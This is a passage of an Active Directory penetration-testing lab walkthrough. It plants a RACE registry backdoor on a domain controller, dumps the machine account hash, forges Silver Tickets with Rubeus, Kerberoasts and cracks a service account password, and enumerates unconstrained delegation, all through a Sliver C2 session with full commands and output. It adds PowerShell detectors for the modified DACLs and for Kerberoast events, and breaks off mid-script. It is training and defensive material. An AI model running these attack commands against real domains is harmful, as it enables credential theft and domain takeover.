To retrieve the machine account hash of dcorp-dc without Domain Admin privileges, we need administrative access on the DC once, to modify permissions. The RACE toolkit implements a remote registry backdoor for exactly this: Add-RemoteRegBackdoor changes the DACLs of the registry keys that hold the boot key (under SYSTEM\CurrentControlSet\Control\Lsa), the LSA secrets (SECURITY hive) and the SAM account data, so that a chosen trustee can read them over the Remote Registry service. Get-RemoteMachineAccountHash later uses only that read access to recover the machine account hash, which is why the backdoor survives as persistence even after the administrative access is lost. We use RACE with PS2EXE, as before, to run both steps via execute-assembly.

The command to set permissions for dcorp\studentX to retrieve the machine account hash using RACE.ps1 is as follows.
Add-RemoteRegBackdoor -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Trustee studentX -Verbose

The command to retrieve the machine account hash using RACE.ps1, after the permissions are set, is as follows.
Get-RemoteMachineAccountHash -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose

We create two executable scripts, RACEEx1.ps1 and RACEEx2.ps1, by copying RACE.ps1 twice so that each copy carries all the functions it needs.
PS C:\Windows\system32> copy C:\AD\Tools\RACE.ps1 C:\AD\Tools\RACEEx1.ps1
PS C:\Windows\system32> copy C:\AD\Tools\RACE.ps1 C:\AD\Tools\RACEEx2.ps1

Append the following line (at the end) to RACEEx1.ps1 and save it. This script runs as dcorp\svcadmin and plants the registry backdoor that lets dcorp\studentX retrieve the machine account hash.
Add-RemoteRegBackdoor -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Trustee studentX -Verbose

Append the following line (at the end) to RACEEx2.ps1 and save it. This script runs as dcorp\studentX and retrieves the machine account hash.
Get-RemoteMachineAccountHash -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose

Next, convert RACEEx1.ps1 and RACEEx2.ps1 to .NET assemblies using PS2EXE.ps1 as follows.
PS C:\Windows\system32> .\ps2exe.ps1 -inputFile C:\AD\Tools\RACEEx1.ps1 -outputFile C:\AD\Tools\RACEEx1.exe -x64 -sta

Reading input file C:\AD\Tools\RACEEx1.ps1
Compiling file...
Output file C:\AD\Tools\RACEEx1.exe written

PS C:\Windows\system32> .\ps2exe.ps1 -inputFile C:\AD\Tools\RACEEx2.ps1 -outputFile C:\AD\Tools\RACEEx2.exe -x64 -sta

Reading input file C:\AD\Tools\RACEEx2.ps1
Compiling file...
Output file C:\AD\Tools\RACEEx2.exe written

Execute these binaries with execute-assembly, impersonating dcorp\svcadmin for RACEEx1.exe (planting the backdoor needs administrative rights on dcorp-dc) and dcorp\studentX for RACEEx2.exe (retrieving the hash needs only the read access the backdoor grants).
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'C:\windows\system32\taskhostw.exe' -t 80 /mnt/c/AD/Tools/Rubeus.exe 'asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /show /ptt'

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/RACEEx1.exe'

[*] Output:

[............snip............]

VERBOSE: [dcorp-dc.dollarcorp.moneycorp.local : SAM\SAM\Domains\Account] Creating the trustee WMI object with user 'studentX'
VERBOSE: [dcorp-dc.dollarcorp.moneycorp.local : SAM\SAM\Domains\Account] Applying Trustee to new Ace
VERBOSE: [dcorp-dc.dollarcorp.moneycorp.local : SAM\SAM\Domains\Account] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [dcorp-dc.dollarcorp.moneycorp.local : SAM\SAM\Domains\Account] Backdooring completed for key
VERBOSE: [dcorp-dc.dollarcorp.moneycorp.local] Backdooring completed for system

ComputerName                        BackdoorTrustee
------------                        ---------------
dcorp-dc.dollarcorp.moneycorp.local studentX

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'C:\windows\system32\taskhostw.exe' -t 80 /mnt/c/AD/Tools/Rubeus.exe 'asktgt /user:studentX /password:JPIzbuWHdSfq9NFr /show /ptt'

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/RACEEx2.exe'

[*] Output:
VERBOSE: Bootkey/SysKey : BAB78ACD91795C983AEF0534E0DB38C7
VERBOSE: LSA Key : BDC807FEC0BB38EB0AE338451573904220F8B69404F719BDDB03F8618E84005C

ComputerName                        MachineAccountHash
------------                        ------------------
dcorp-dc.dollarcorp.moneycorp.local 36abeac4022fa23f94dd8480c67b5e6e
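Both halves of this objective work by adding an ACE for a low-privileged SID to a security descriptor that normally only lists built-in principals (the root\cimv2 namespace and DCOM permissions above, the PowerShell session configuration, and now the registry keys that guard the machine account secrets). The defensive check a practitioner wants is therefore the same in every case: decode the DACL and flag any trustee outside the default set. The following PowerShell is an added example written for this page; it is not part of the lab manual or of the RACE toolkit. The WMI and DCOM SDDL strings are copied from the VERBOSE output shown above; the PSRemoting and registry strings are constructed around the same student SID, and the right-name tables are the documented Win32 constants for each object type.

```powershell
# Added example, not part of the lab manual or the RACE toolkit: decode the DACLs
# that Objective 13 modifies (WMI namespace, DCOM, PSRemoting session
# configuration, registry keys) and flag trustees that are not in the default set.
# Sample SDDLs are constructed for this demo: the WMI and DCOM strings mirror the
# VERBOSE output in the lab, the PSRemoting and registry strings are made up.
Set-StrictMode -Version Latest

# Trustees present in these DACLs on a default install; anything else is reported.
$DefaultTrustees = @(
    'S-1-5-32-544', # BA  Administrators
    'S-1-5-32-559', # LU  Performance Log Users
    'S-1-5-32-562', # Distributed COM Users
    'S-1-5-32-580', # RM  Remote Management Users
    'S-1-5-18',     # SY  SYSTEM
    'S-1-5-19',     # LS  LOCAL SERVICE
    'S-1-5-20',     # NS  NETWORK SERVICE
    'S-1-5-11',     # AU  Authenticated Users
    'S-1-5-4',      # IU  INTERACTIVE
    'S-1-1-0',      # WD  Everyone
    'S-1-15-2-1'    # AC  ALL APPLICATION PACKAGES
)

# Meaning of the access-mask bits per object type (documented Win32 constants).
$RightsTables = @{
    Wmi     = [ordered]@{ 0x1 = 'WBEM_ENABLE'; 0x2 = 'WBEM_METHOD_EXECUTE'; 0x4 = 'WBEM_FULL_WRITE_REP'
                          0x8 = 'WBEM_PARTIAL_WRITE_REP'; 0x10 = 'WBEM_WRITE_PROVIDER'; 0x20 = 'WBEM_REMOTE_ACCESS'
                          0x40 = 'WBEM_RIGHT_SUBSCRIBE'; 0x80 = 'WBEM_RIGHT_PUBLISH'
                          0x20000 = 'READ_CONTROL'; 0x40000 = 'WRITE_DAC'; 0x80000 = 'WRITE_OWNER' }
    Dcom    = [ordered]@{ 0x1 = 'COM_RIGHTS_EXECUTE'; 0x2 = 'COM_RIGHTS_EXECUTE_LOCAL'; 0x4 = 'COM_RIGHTS_EXECUTE_REMOTE'
                          0x8 = 'COM_RIGHTS_ACTIVATE_LOCAL'; 0x10 = 'COM_RIGHTS_ACTIVATE_REMOTE' }
    Generic = [ordered]@{ 0x10000000 = 'GENERIC_ALL'; 0x20000000 = 'GENERIC_EXECUTE'
                          0x40000000 = 'GENERIC_WRITE'; 0x80000000 = 'GENERIC_READ' }
}

function ConvertFrom-AccessMask {
    param([int]$Mask, [ValidateSet('Wmi', 'Dcom', 'Generic', 'Registry')][string]$Kind)
    if ($Kind -eq 'Registry') {  # .NET already names the registry bits
        return ([System.Security.AccessControl.RegistryRights]$Mask).ToString()
    }
    $left  = [int64]$Mask -band 0xFFFFFFFFL          # treat the mask as unsigned
    $names = @(foreach ($bit in $RightsTables[$Kind].Keys) {
        if ($left -band $bit) { $RightsTables[$Kind][$bit]; $left = $left -bxor $bit }
    })
    if ($left -ne 0) { $names += '0x{0:X}' -f $left }   # bits the table does not name
    return ($names -join ', ')
}

function Get-DaclReport {
    # One object per access ACE in the DACL of an SDDL string.
    param([string]$Label, [string]$Sddl,
          [ValidateSet('Wmi', 'Dcom', 'Generic', 'Registry')][string]$Kind)
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($Sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace -isnot [System.Security.AccessControl.CommonAce]) { continue }  # skip object/custom ACEs
        $sid = $ace.SecurityIdentifier.Value
        [pscustomobject]@{
            Object     = $Label
            Trustee    = $sid
            Type       = $ace.AceType.ToString()
            Inherited  = [bool]($ace.AceFlags -band [System.Security.AccessControl.AceFlags]::Inherited)
            Rights     = ConvertFrom-AccessMask -Mask $ace.AccessMask -Kind $Kind
            Unexpected = ($ace.AceType -eq [System.Security.AccessControl.AceType]::AccessAllowed) -and
                         ($DefaultTrustees -notcontains $sid)
        }
    }
}

$StudentSid = 'S-1-5-21-1874506631-3219952063-538504511-52621'   # dcorp\studentX in the lab output
$Samples = @(
    @{ Label = 'WMI root\cimv2 on dcorp-dc (lab output)'; Kind = 'Wmi'
       Sddl  = "O:BAG:BAD:(A;CIID;CCDCLCSWRPWPRCWD;;;BA)(A;CIID;CCDCRP;;;NS)(A;CIID;CCDCRP;;;LS)(A;CIID;CCDCRP;;;AU)(A;CI;CCDCLCSWRPWPRCWD;;;$StudentSid)" }
    @{ Label = 'DCOM launch/access on dcorp-dc (lab output)'; Kind = 'Dcom'
       Sddl  = "O:BAG:BAD:(A;;CCDCLCSWRP;;;BA)(A;;CCDCSW;;;WD)(A;;CCDCLCSWRP;;;S-1-5-32-562)(A;;CCDCLCSWRP;;;LU)(A;;CCDCSW;;;AC)(A;;CCDCLCSWRP;;;$StudentSid)" }
    @{ Label = 'PSRemoting Microsoft.PowerShell session configuration (constructed)'; Kind = 'Generic'
       Sddl  = "O:NSG:BAD:P(A;;GA;;;BA)(A;;GA;;;S-1-5-32-580)(A;;GA;;;IU)(A;;GA;;;$StudentSid)S:P(AU;FA;GA;;;WD)(AU;SA;GXGW;;;WD)" }
    @{ Label = 'HKLM\SECURITY\Policy\Secrets (constructed)'; Kind = 'Registry'
       Sddl  = "O:SYG:SYD:(A;CI;KA;;;SY)(A;CI;RCWD;;;BA)(A;CI;KR;;;$StudentSid)" }
)

function Find-UnexpectedAce {
    foreach ($s in $Samples) { Get-DaclReport @s | Where-Object { $_.Unexpected } }
}
Find-UnexpectedAce | Format-Table Object, Trustee, Rights -AutoSize -Wrap

# Live collection on the target (elevated), in place of the constructed strings:
#   WMI        : $b = (Invoke-WmiMethod -Namespace root\cimv2 -Path __SystemSecurity=@ -Name GetSD).SD
#                (New-Object System.Security.AccessControl.RawSecurityDescriptor([byte[]]$b, 0)).GetSddlForm('All')
#   PSRemoting : (Get-PSSessionConfiguration -Name Microsoft.PowerShell).SecurityDescriptorSddl
#   Registry   : (Get-Acl -Path 'HKLM:\SECURITY\Policy\Secrets').Sddl
```

Run against the lab strings, the report lists the student SID on every object, and the WMI row decodes its mask to the same rights Administrators hold, WRITE_DAC included, which is the detail that makes the ACE a persistence foothold rather than a read-only grant. The registry decoder is what you would point at the keys Add-RemoteRegBackdoor touches; the live-collection lines show where each SDDL comes from on a real host.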

Use the gathered dcorp-dc machine account hash to forge Silver Tickets for the HOST and RPCSS services on dcorp-dc, which are the two services WMI (DCOM over RPC) authenticates to. Because a Silver Ticket is forged with the service account's key and never requested from the KDC, the DC records no TGS request for it; only the target host ever sees the ticket. Start by using Rubeus to forge and import a ticket for the HOST service.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/Rubeus.exe' 'silver /service:host/dcorp-dc.dollarcorp.moneycorp.local /rc4:36abeac4022fa23f94dd8480c67b5e6e /user:administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /ptt'

[*] Action: Build TGS


[*] Building PAC
[*] Domain : DOLLARCORP.MONEYCORP.LOCAL (DOLLARCORP)
[*] SID : S-1-5-21-1874506631-3219952063-538504511
[*] UserId : 500
[*] Groups : 520,512,513,519,518
[*] ServiceKey : CDD5FA53BCF4A4E240DEA7ADD0A8E374B2764FA7ADEF1615C0A4C52367793714
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey : CDD5FA53BCF4A4E240DEA7ADD0A8E374B2764FA7ADEF1615C0A4C52367793714
[*] KDCKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service : host
[*] Target : dcorp-dc.dollarcorp.moneycorp.local
[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGS for 'administrator' to 'host/dcorp-dc.dollarcorp.moneycorp.local'
[*] AuthTime : 1/23/2024 9:09:11 AM
[*] StartTime : 1/23/2024 9:09:11 AM
[*] EndTime : 1/23/2024 7:09:11 PM
[*] RenewTill : 1/30/2024 9:09:11 AM

[*] base64(ticket.kirbi): [...........snip...........]


[+] Ticket successfully imported!

Similarly forge and import a ticket for RPCSS using Rubeus.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/Rubeus.exe' 'silver /service:rpcss/dcorp-dc.dollarcorp.moneycorp.local /rc4:36abeac4022fa23f94dd8480c67b5e6e /user:administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /ptt'

[*] Action: Build TGS
[*] Building PAC
[*] Domain : DOLLARCORP.MONEYCORP.LOCAL (DOLLARCORP)
[*] SID : S-1-5-21-1874506631-3219952063-538504511
[*] UserId : 500
[*] Groups : 520,512,513,519,518

[............snip..............]

[*] Generating EncTicketPart


[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGS for 'administrator' to 'rpcss/dcorp-dc.dollarcorp.moneycorp.local'
[*] AuthTime : 1/23/2024 9:10:14 AM
[*] StartTime : 1/23/2024 9:10:14 AM
[*] EndTime : 1/23/2024 7:10:14 PM
[*] RenewTill : 1/30/2024 9:10:14 AM
[*] base64(ticket.kirbi):

[............snip.... .........]

[+] Ticket successfully imported!

To test WMI rights over dcorp-dc, we can use sharp-wmi / CIMplant as follows.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\system32\taskhostw.exe' -t 45 '/mnt/c/AD/Tools/SharpWMI.exe' 'computername=dcorp-dc.dollarcorp.moneycorp.local action=query query="select * from win32_process"'

[*] sharp-wmi output:

Scope: \\dcorp-dc\root\cimv2

Caption : System Idle Process


CommandLine :
CreationClassName : Win32_Process
CreationDate : 20220927200512.156248-420
CSCreationClassName : Win32_ComputerSystem
CSName : DCORP-DC
Description : System Idle Process
ExecutablePath :
ExecutionState :
Handle : 0
HandleCount : 0
InstallDate :
KernelModeTime : 394253906250

MaximumWorkingSetSize :
MinimumWorkingSetSize :
Name : System Idle Process
OSCreationClassName : Win32_OperatingSystem
OSName : Microsoft Windows Server 2016 Standard

[...................snip.....................]

Purge all tickets using Rubeus.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Rubeus.exe' purge

[*] rubeus output:


[*] Action: Purge Tickets
Luid: 0x0
[+] Tickets successfully purged!

Learning Objective 14
Using the Kerberoast attack, crack password of a SQL server service account.

Perform the Kerberoast attack
Using StandIn, Rubeus and John the Ripper
We first need to find services that run under user accounts: machine accounts have long, random, automatically rotated passwords, so tickets encrypted with their keys are not worth cracking. We can enumerate user accounts with an SPN set using StandIn from the dcorp-stdX session; the --spn flag returns all Kerberoastable accounts.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/StandIn.exe' --spn

[*] Output:

[?] Using DC : dcorp-dc.dollarcorp.moneycorp.local


[?] Found 1 kerberostable users..

[*] SamAccountName : websvc


DistinguishedName : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ServicePrincipalName : SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL, SNMP/ufc-adminsrv
PwdLastSet : 11/14/2022 12:42:13 PM UTC
lastlogon : 11/16/2022 12:05:33 PM UTC
Supported ETypes : RC4_HMAC_DEFAULT

[*] SamAccountName : svcadmin


DistinguishedName : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ServicePrincipalName : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433, MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local
PwdLastSet : 11/14/2022 5:06:37 PM UTC
lastlogon : 1/19/2024 12:07:01 PM UTC
Supported ETypes : RC4_HMAC_DEFAULT

An alternative is a raw LDAP query with the --ldap argument and the filter (&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)), which returns every user object that has a servicePrincipalName set. The --filter argument limits the output to samaccountname and serviceprincipalname. Note that this raw filter also returns krbtgt (SPN kadmin/changepw), which is a disabled account and not Kerberoastable; StandIn's --spn mode leaves it out.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/StandIn.exe' --ldap "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))" --filter samaccountname,serviceprincipalname

[*] Output:

[?] Using DC : dcorp-dc.dollarcorp.moneycorp.local


[+] LDAP search result count : 2
|_ Result limit : 50

[?] Iterating result properties


|_ Applying property filter => samaccountname,serviceprincipalname

[?] Object : CN=krbtgt


Path : LDAP://CN=krbtgt,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[+] serviceprincipalname
|_ kadmin/changepw
[+] samaccountname
|_ krbtgt

[?] Object : CN=web svc


Path : LDAP://CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[+] serviceprincipalname
|_ SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL
|_ SNMP/ufc-adminsrv
[+] samaccountname
|_ websvc

[?] Object : CN=svc admin


Path : LDAP://CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[+] serviceprincipalname
|_ MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433, MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local
[+] samaccountname
|_ svcadmin

We can then use Rubeus to request service tickets and write the resulting hashes to a text file for offline cracking. Specific users can be targeted with the /user option and all users in an OU with the /ou option. The /rc4opsec switch uses the tgtdeleg trick to obtain a TGT for the current user without touching LSASS and only roasts accounts that do not support AES, so the RC4 service ticket it requests is what those accounts would receive anyway; /simple prints just the hash.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/Rubeus.exe' 'kerberoast /user:svcadmin /simple /rc4opsec /outfile:C:\AD\Tools\hashes.txt'

[*] Action: Kerberoasting

[*] Using 'tgtdeleg' to request a TGT for the current user


[*] RC4_HMAC will be the requested for AES-enabled accounts, all etypes will be requested for everything else
[*] Target User : svcadmin
[*] Target Domain : dollarcorp.moneycorp.local
[+] Ticket successfully imported!
[*] Searching for accounts that only support RC4_HMAC, no AES

[*] Searching path 'LDAP://dcorp-dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for '(&(samAccountType=805306368)(servicePrincipalName=*)(samAccountName=svcadmin)(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(!msds-supportedencryptiontypes:1.2.840.113556.1.4.804:=24))'

[*] Total kerberoastable users : 1


[*] Hash written to C:\AD\Tools\hashes.txt
[*] Roasted hashes written to : C:\AD\Tools\hashes.txt

We can now run a dictionary attack against the hash with John the Ripper. Please note that you need to remove ":1433" from the SPN in hashes.txt before running John:
$krb5tgs$23$*svcadmin$dollarcorp.moneycorp.local$MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433*
should become
$krb5tgs$23$*svcadmin$dollarcorp.moneycorp.local$MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local*

Run the below command in a new PowerShell session after making the above change.
PS C:\AD\Tools> C:\AD\Tools\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
*ThisisBlasphemyThisisMadness!! (?)
1g 0:00:00:00 DONE (2023-03-03 09:18) 90.90g/s 186181p/s 186181c/s 186181C/s
energy..mollie
Use the "--show" option to display all of the cracked passwords reliably
Session completed
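Every ticket Rubeus requested above is recorded on the DC as Security event 4769 (a Kerberos service ticket was requested), and the two things that make a roast stand out there are the encryption type (0x17, RC4-HMAC, for a user-account SPN) and one client asking for many user-account services in quick succession. The following PowerShell is an added example written for this page, not part of the lab manual or of Rubeus. It parses 4769 records into objects and applies those two rules; the records are constructed XML in the shape Get-WinEvent's ToXml() returns (event namespace omitted), with account names and addresses made up to match the lab domain, and the sqlsvc and reportsvc accounts are invented for the demo.

```powershell
# Added example, not part of the lab manual or Rubeus: flag Kerberoast indicators
# in Security event 4769 records. The sample records are constructed XML in the
# shape Get-WinEvent's ToXml() returns (namespace omitted); names and addresses
# are made up to match the lab domain, sqlsvc and reportsvc are invented accounts.
Set-StrictMode -Version Latest

$Sample4769 = @'
<Events>
 <Event><System><EventID>4769</EventID><TimeCreated SystemTime="2024-01-19T12:07:01Z"/></System>
  <EventData><Data Name="TargetUserName">studentX@DOLLARCORP.MONEYCORP.LOCAL</Data><Data Name="ServiceName">svcadmin</Data>
  <Data Name="TicketEncryptionType">0x17</Data><Data Name="IpAddress">::ffff:172.16.100.1</Data><Data Name="Status">0x0</Data></EventData></Event>
 <Event><System><EventID>4769</EventID><TimeCreated SystemTime="2024-01-19T12:07:02Z"/></System>
  <EventData><Data Name="TargetUserName">studentX@DOLLARCORP.MONEYCORP.LOCAL</Data><Data Name="ServiceName">websvc</Data>
  <Data Name="TicketEncryptionType">0x17</Data><Data Name="IpAddress">::ffff:172.16.100.1</Data><Data Name="Status">0x0</Data></EventData></Event>
 <Event><System><EventID>4769</EventID><TimeCreated SystemTime="2024-01-19T12:07:03Z"/></System>
  <EventData><Data Name="TargetUserName">studentX@DOLLARCORP.MONEYCORP.LOCAL</Data><Data Name="ServiceName">sqlsvc</Data>
  <Data Name="TicketEncryptionType">0x17</Data><Data Name="IpAddress">::ffff:172.16.100.1</Data><Data Name="Status">0x0</Data></EventData></Event>
 <Event><System><EventID>4769</EventID><TimeCreated SystemTime="2024-01-19T12:08:10Z"/></System>
  <EventData><Data Name="TargetUserName">appadmin@DOLLARCORP.MONEYCORP.LOCAL</Data><Data Name="ServiceName">DCORP-MGMT$</Data>
  <Data Name="TicketEncryptionType">0x12</Data><Data Name="IpAddress">::ffff:172.16.4.44</Data><Data Name="Status">0x0</Data></EventData></Event>
 <Event><System><EventID>4769</EventID><TimeCreated SystemTime="2024-01-19T12:30:00Z"/></System>
  <EventData><Data Name="TargetUserName">srvadmin@DOLLARCORP.MONEYCORP.LOCAL</Data><Data Name="ServiceName">reportsvc</Data>
  <Data Name="TicketEncryptionType">0x12</Data><Data Name="IpAddress">::ffff:172.16.4.44</Data><Data Name="Status">0x0</Data></EventData></Event>
</Events>
'@

function ConvertFrom-Event4769 {
    # Turns one or more <Event> records into flat objects.
    param([string]$Xml)
    $doc = [xml]$Xml
    foreach ($ev in $doc.Events.Event) {
        $d = @{}
        foreach ($item in $ev.EventData.Data) { $d[$item.Name] = $item.'#text' }
        [pscustomobject]@{
            Time      = [datetime]$ev.System.TimeCreated.SystemTime
            Requester = $d['TargetUserName'].Split('@')[0]
            Source    = $d['IpAddress'] -replace '^::ffff:', ''
            Service   = $d['ServiceName']
            EType     = [int]$d['TicketEncryptionType']   # 0x17 = RC4-HMAC, 0x12 = AES256
            Status    = $d['Status']
        }
    }
}

function Find-KerberoastIndicators {
    param([object[]]$Events, [int]$Threshold = 3, [int]$WindowMinutes = 5)
    $findings = New-Object System.Collections.Generic.List[object]
    # Only user-account SPNs are worth roasting: drop machine accounts ($) and the krbtgt TGS.
    $userSpn = @($Events | Where-Object { $_.Service -notmatch '\$$' -and $_.Service -ne 'krbtgt' -and $_.Status -eq '0x0' })

    # Rule 1: an RC4 service ticket for a user-account SPN (what /rc4opsec requests).
    foreach ($e in $userSpn) {
        if ($e.EType -eq 0x17) {
            $findings.Add([pscustomobject]@{ Rule = 'Rc4UserSpn'; Requester = $e.Requester; Source = $e.Source; Detail = $e.Service; Time = $e.Time })
        }
    }
    # Rule 2: one requester collecting tickets for many distinct user-account services in a short window.
    foreach ($g in ($userSpn | Group-Object Requester, Source)) {
        $sorted   = @($g.Group | Sort-Object Time)
        $span     = ($sorted[-1].Time - $sorted[0].Time).TotalMinutes
        $services = @($sorted | ForEach-Object { $_.Service } | Sort-Object -Unique)
        if ($services.Count -ge $Threshold -and $span -le $WindowMinutes) {
            $findings.Add([pscustomobject]@{ Rule = 'Sweep'; Requester = $sorted[0].Requester; Source = $sorted[0].Source; Detail = ($services -join ','); Time = $sorted[0].Time })
        }
    }
    return $findings
}

$events = ConvertFrom-Event4769 -Xml $Sample4769
Find-KerberoastIndicators -Events $events | Format-Table -AutoSize

# Live equivalent on a DC (Security log read access required):
#   Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4769 } -MaxEvents 5000 |
#       ForEach-Object { ConvertFrom-Event4769 -Xml "<Events>$($_.ToXml())</Events>" }
```

On the constructed records the three studentX requests trip the RC4 rule individually and the sweep rule together, while the AES requests from appadmin and srvadmin are left alone. The RC4 rule has an important caveat that this very lab illustrates: svcadmin and websvc only support RC4 (Supported ETypes: RC4_HMAC_DEFAULT above), so for them an RC4 ticket is also what legitimate clients get, and /rc4opsec is designed to look exactly like that. The rule therefore carries real weight only once service accounts are configured for AES in msDS-SupportedEncryptionTypes, at which point any 0x17 ticket for a user SPN is a downgrade worth alerting on; until then, the volume rule and the requesting host are what separate a roast from normal traffic.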

Learning Objective 15
• Find a server in the dcorp domain where Unconstrained Delegation is enabled.

• Compromise the server and escalate to Domain Admin privileges.

• Escalate to Enterprise Admins privileges by abusing Printer Bug!

Find a server where Unconstrained Delegation is enabled
Using StandIn
We first need to find a server that has unconstrained delegation enabled. We can use StandIn from the dcorp-stdX session; the --delegation argument enumerates every type of delegation configured in the domain.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/StandIn.exe' --delegation

[*] Output:

[?] Using DC : dcorp-dc.dollarcorp.moneycorp.local


[?] Found 2 object(s) with unconstrained delegation..

[*] SamAccountName : DCORP-APPSRV$
DistinguishedName : CN=DCORP-APPSRV,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
userAccountControl : WORKSTATION_TRUST_ACCOUNT, DONT_EXPIRE_PASSWD, TRUSTED_FOR_DELEGATION

[*] SamAccountName : DCORP-DC$
DistinguishedName : CN=DCORP-DC,OU=Domain Controllers,DC=dollarcorp,DC=moneycorp,DC=local
userAccountControl : SERVER_TRUST_ACCOUNT, DONT_EXPIRE_PASSWD, TRUSTED_FOR_DELEGATION

[.....snip....]

Domain controllers carry TRUSTED_FOR_DELEGATION by default, so DCORP-DC$ is expected in this list; the result of interest is DCORP-APPSRV$.

Using ADSearch
We can use ADSearch to find servers with unconstrained delegation enabled from the dcorp-stdX session, passing an LDAP filter with the --search argument: (&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288)). The matching rule 1.2.840.113556.1.4.803 is a bitwise AND, so the filter matches computer objects whose userAccountControl has the TRUSTED_FOR_DELEGATION bit (0x80000 = 524288) set, which is unconstrained delegation.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 60 '/mnt/c/AD/Tools/ADSearch.exe' '--search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem'

[*] Output:
___ ____ _____ __
/ | / __ \/ ___/___ ____ ______/ /_
/ /| | / / / /\__ \/ _ \/ __ `/ ___/ __ \
/ ___ |/ /_/ /___/ / __/ /_/ / /__/ / / /
/_/ |_/_____//____/\___/\__,_/\___/_/ /_/
Twitter: @tomcarver_
GitHub: @tomcarver16

[*] No domain supplied. This PCs domain will be used instead


[*] LDAP://DC=dollarcorp,DC=moneycorp,DC=local
[*] CUSTOM SEARCH:
[*] TOTAL NUMBER OF SEARCH RESULTS: 2
[+] samaccountname : DCORP-DC$
[+] dnshostname : dcorp-dc.dollarcorp.moneycorp.local
[+] operatingsystem : Windows Server 2016 Standard

[+] samaccountname : DCORP-APPSRV$


[+] dnshostname : dcorp-appsrv.dollarcorp.moneycorp.local
[+] operatingsystem : Windows Server 2016 Standard
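Both tools above reduce to the same two things: a bitwise test on userAccountControl and a look at the delegation attributes, since unconstrained delegation is a UAC flag while constrained delegation lives in msDS-AllowedToDelegateTo (with TRUSTED_TO_AUTH_FOR_DELEGATION marking protocol transition) and resource-based constrained delegation in msDS-AllowedToActOnBehalfOfOtherIdentity on the target. The following PowerShell is an added example written for this page, not part of the lab manual, StandIn or ADSearch. It classifies computer objects by delegation type, extends the lab's filter to drop domain controllers (which always appear, as noted above), and runs offline against constructed objects: the two lab hosts with the flags the StandIn output shows, plus a made-up DCORP-WEB$ with constrained delegation.

```powershell
# Added example, not part of the lab manual, StandIn or ADSearch: classify the
# delegation configured on computer accounts from userAccountControl and the
# delegation attributes. Sample objects are constructed: the two lab hosts carry
# the flags shown in the StandIn output, DCORP-WEB$ is invented for the demo.
Set-StrictMode -Version Latest

# userAccountControl bits relevant here (documented AD flag values).
$UacFlags = [ordered]@{
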